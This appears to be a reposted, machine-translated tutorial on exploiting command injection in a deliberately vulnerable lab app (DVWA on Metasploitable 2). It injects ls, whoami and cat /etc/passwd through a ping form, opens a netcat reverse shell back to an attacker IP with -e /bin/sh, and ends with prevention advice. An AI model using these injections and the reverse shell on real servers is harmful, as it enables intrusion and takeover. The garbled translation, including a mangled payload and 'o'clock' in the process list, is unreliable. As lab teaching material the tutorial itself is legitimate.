قالب وردپرس درنا توس
Home / Tips and Tricks / How to Use Command Injection to Open a Reverse Shell on a Web Server «Null Byte :: WonderHowTo

How to Use Command Injection to Open a Reverse Shell on a Web Server «Null Byte :: WonderHowTo



Command Injection is a technique used by hackers to execute system commands on a server, usually through a web application or some type of GUI. This can happen when an application offers the user some functionality using system commands. If the input is not cleaned up properly, commands that should not be executed initially should be executed.

Since the application works in principle like an improvised shell, this type of attack can lead to devastating consequences. Depending on the privileges the application has, an attacker can do anything, including viewing configuration files, changing or deleting data, or even getting a shell or creating a backdoor.

It is important to know the difference between code injection and command injection. In code injection, an attacker inserts custom code, which is then executed by the application or program, while the command injection uses the functionality of the application executing system commands. These concepts are similar, but the fact that the command injection is based on the default behavior of the application often makes it easier to exploit.

In this tutorial, I will use DVWA (Damn Vulnerable Web Application) as part of Metasploitable 2. a vulnerable virtual machine to simulate this attack.

Step 1
: Find an Attack Vector

We can begin by looking for a suitable attack vector that we can exploit. In this example, the site has a feature that allows us to ping other domains or IP addresses to test for connectivity. In reality, it would probably be rare to find such a glaring example, but you never know (sometimes the lowest hanging fruit gives the best results). For demonstration purposes, however, this works perfectly.

It's easy to enter the loopback address localhost to test this. We can see the ping answers, it seems to work properly.

Step 2: Test for vulnerabilities by injecting commands

Next, we can try typing a simple command to see if a security gap exists. Linux is running on this particular web server, but the same technique can be applied to Windows servers using Windows commands. We can issue a command with && (AND), ; (delimiter) or | Attach (pipe). Let's try a simple ls first. The injection was successful and the contents of the current directory are displayed:

We can also use the command whoami to update the current username: [19659013] Using Command Injection to Call a Reverse Shell on a Web Server ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

The [unce-a command prints system information such as kernel and operating system:

We can display the contents of / etc / passwd by appending cat / etc / passwd to the following command:

So far, all the commands we've executed have little effect – useful for gathering information about the server, but not v Everything else. What if we could get a shell on the system and fully own it? Well, with the popular tool Netcat we can do just that.

Bind Shells Vs. Reverse Shells

Before we jump into a shell, it's important to understand the differences between binding shells and reverse shells.

A bind shell is a command shell that opens on the target system and essentially binds to a specific port. The attacking system then connects to this monitoring port and an interactive session is initiated. Bind shells are not often used today because an active firewall blocks inbound connections to a random port.

An inverted shell, on the other hand, actively connects to the attacking machine from the target. In this situation, the attacking device has an open port waiting for incoming connections. Because outbound traffic is less likely to be filtered by the firewall, a reverse shell is often the preferred choice.

Step 3: Using Netcat to Obtain a Shell

Netcat is a powerful network utility for testing TCP or UDP connections. Other features include debugging, port scanning, file transfer and backdoor functions. We can use Netcat to create a reverse shell on the web server, if it is installed, and connect to our machine, which allows complete control of the system.

First we use the following command on our local system listener for incoming connections. The use for Netcat is nc the -l flag opens a listener and -p 1234 instructs them to use port 1234, but any random port works ,

  nc -l -p 1234 

Next, in the ping utility of the web application, add the following command to create a shell on the server and connect to our machine:

  172.16.1.100 1234 -e / bin / sh 

This connects to the IP address 172.16.1.100 on port 1234 and -e / bin / sh executes a shell, which is returned to our system. Now we can try to execute commands conveniently from our terminal. Use whoami to display the current user:

  root @ drd: ~ # nc -l -p 1234
who am I
www-data 

For system information, use the command uname -a :

  root @ drd: ~ # nc -l -p 1234
who am I
www-data
uname -a
Linux metsploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux 

Or, use ps to see running processes:

  root @drd: ~ # nc -l -p 1234
who am I
www-data
uname -a
Linux metsploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
ps
PID TTY TIME CMD
4638? 00:00:00 apache2
4642? 00:00:00 apache2
4644? 00:00:00 apache2
4645? 00:00:00 apache2
4778? 00:00:00 apache2
4783? 00:00:00 apache2
4797? 00:00:00 o'clock
4799? 00:00:00 o'clock
4815? 00:00:00 apache2
4858? 00:00:00 apache2
4864? 00:00:00 apache2
4967? 00:00:00 apache2
5004? 00:00:00 o'clock
5006? 00:00:00 o'clock
5075? 00:00:00 php
5076? 00:00:00 o'clock
5078? 00:00:00 o'clock
5120? 00:00:00 ps 

From here we can switch to other systems in the network, create a backdoor or take the server completely offline. The possibilities are endless now that we have essentially owned the server.

How to Prevent Command Injection

As with many attacks occurring on the Internet, especially with other injection techniques, command injection can be successfully prevented and mitigated. Input validation is present. Filtering certain phrases and special characters, or ideally using a whitelisting approach, reduces the likelihood of malicious attack

Secure coding practices and code reviews are becoming increasingly important to the development process; Limiting what can be exploited from the beginning is a great way to strengthen the overall security posture of a business and its applications. Likewise, using reliable APIs that provide parameterized input is always a safe bet, as well as running applications with the lowest possible privileges.

Ultimately, however, it is best to omit OS command functionality altogether. In many cases, there is no reason why a web-based interface needs to interact with system commands at all. By removing the vulnerability, you have essentially defeated an attacker on this front.

Conclusion

Again and again we have seen how poorly validated input can lead to exploitation, especially when dealing with web applications. Command injection is based on functions that contain OS commands, typically through a web app or GUI. If unintentional commands are allowed to run on the system, an attacker could own the server and get a shell, as we demonstrated with Netcat. This shows how seemingly innocuous implementations can be compromised and exploited.

Title image by blickpixel / Pixabay; Screenshots of drd_ / zero byte

Source link